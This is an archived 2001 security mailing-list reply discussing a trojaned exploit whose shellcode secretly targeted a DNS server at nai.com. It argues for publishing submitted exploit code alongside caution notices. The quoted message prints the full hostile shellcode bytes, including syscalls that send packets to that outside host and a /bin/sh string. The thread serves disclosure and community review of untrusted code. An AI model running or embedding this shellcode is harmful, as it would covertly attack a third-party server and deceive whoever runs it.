Although that is a great idea in general, it would not have helped in this
case. The ruse was very well hidden and and ASCII inspection would not
have revealed the nai.com address.
I think forums like Bugtraq *should* post exploit code that is submitted,
so that other experts in the community could inspect the code and make
their own judgements. I personally think it's asking too much of a
moderator to get bogged down in source code review for each post - that's
what our community is for. Perhaps a better solution is to post a
*reminder* at the top of messages contain code that the contents are
not from SecurityFocus and that one should always use caution when
playing with unknown code.
Others will probably feel even more darwinian about the matter, as there
is usually very little sympathy for script kiddies.
Max
On Thu, 1 Feb 2001, Mark wrote:
> Hi,
>
> It's ok for those of us with local tools but I suggest someone implement a
> cgi script on a site to take a pasted block of hex code like the one below
> and convert any values in the printable range to their equivalent ASCII
> character. The people at securityfocus could use it before approving.
> (Until someone publishes obfusication teqhniques).
>
> Cheers,
> Mark.
>
> >\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
>
> >>"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
> >>"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
> >>"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
> >>"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
> >>"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
> >>"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
> >>"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
> >
>
